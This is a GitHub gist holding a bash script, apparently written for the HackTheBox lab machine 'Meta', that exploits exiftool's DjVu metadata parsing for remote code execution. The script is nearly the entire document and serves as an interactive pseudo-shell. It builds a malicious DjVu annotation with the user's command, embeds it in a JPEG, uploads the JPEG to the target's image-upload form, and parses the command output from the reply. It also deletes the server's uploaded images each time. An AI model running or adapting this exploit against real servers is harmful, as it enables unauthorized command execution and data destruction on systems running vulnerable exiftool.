Skip to content

Instantly share code, notes, and snippets.

@xl00t
Last active May 8, 2022 15:52
Show Gist options
  • Save xl00t/e0a4069e41e96e359a67c1890b63d6dc to your computer and use it in GitHub Desktop.
Save xl00t/e0a4069e41e96e359a67c1890b63d6dc to your computer and use it in GitHub Desktop.
meta.htb exiftool RCE
#!/usr/bin/env bash
while true; do
read -p "> " userinput
if [[ "$userinput" =~ "exit" ]]; then exit; fi
payload="(metadata \"\\c\${system('rm uploads/*.jpg;echo dfff0a70fa1a55c8c1a4966c19f6da452 ; $userinput ; echo dfff0a70fa1a55c8c1a4966c19f6da452')};\")"
echo $payload > payload
bzz payload payload.bzz
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz
exiftool -config configfile '-HasselbladExif<=exploit.djvu' hacker.jpg 1> /dev/null
curl http://dev01.artcorp.htb/metaview/index.php -F "imageUpload=@hacker.jpg" 2> /dev/null | sed -n -e '/dfff0a70fa1a55c8c1a4966c19f6da452/,/dfff0a70fa1a55c8c1a4966c19f6da452/ p' | sed 's/dfff0a70fa1a55c8c1a4966c19f6da452//' | sed 's/<pre>//' | sed '/^[[:space:]]*$/d'
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment